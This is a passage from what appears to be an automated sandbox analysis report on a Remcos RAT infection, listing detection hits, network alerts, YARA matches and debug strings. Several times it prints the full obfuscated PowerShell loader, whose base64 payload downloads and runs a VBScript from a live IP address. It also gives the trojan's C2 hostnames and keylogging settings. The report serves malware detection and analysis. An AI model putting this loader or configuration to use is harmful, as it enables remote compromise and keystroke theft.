YXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , ProcessId: 1396, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4408, TargetFilename: C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", CommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FI

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline", ProcessId: 4308, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5940, TargetFilename: C:\ProgramData\remcos\logs.dat
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-17T16:05:14.511060+020020229301A Network Trojan was detected4.175.87.197443192.168.2.549714TCP
                      2024-10-17T16:05:52.938851+020020229301A Network Trojan was detected20.109.210.53443192.168.2.549931TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-17T16:04:57.255571+020020204231Exploit Kit Activity Detected107.175.229.13880192.168.2.549715TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-17T16:04:57.255571+020020204251Exploit Kit Activity Detected107.175.229.13880192.168.2.549715TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-17T16:05:01.100829+020020365941Malware Command and Control Activity Detected192.168.2.549721192.169.69.269674TCP
                      2024-10-17T16:05:03.125743+020020365941Malware Command and Control Activity Detected192.168.2.549724192.169.69.269764TCP
                      2024-10-17T16:05:06.091751+020020365941Malware Command and Control Activity Detected192.168.2.549727192.3.101.1539764TCP
                      2024-10-17T16:05:22.355388+020020365941Malware Command and Control Activity Detected192.168.2.549730192.3.101.1539764TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-17T16:04:52.474984+020020490381A Network Trojan was detected185.199.108.133443192.168.2.549706TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-17T16:05:22.831414+020028033043Unknown Traffic192.168.2.549731178.237.33.5080TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["danbana.duckdns.org:9674:1", "danbana.duckdns.org:9764:1", "dantata.duckdns.org:9764:1", "dantata.duckdns.org:9674:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UCDCW8", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4545370630.00000000026AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004338C8
                      Source: powershell.exe, 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b600d146-6

                      Exploits

                      barindex
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407538 _wcslen,CoGetObject,11_2_00407538
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2387421374.0000000007890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbSyMB source: powershell.exe, 00000003.00000002.2133431381.000000000886F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000003.00000002.2133602889.00000000088AA000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2131065776.0000000007872000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2387421374.0000000007890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
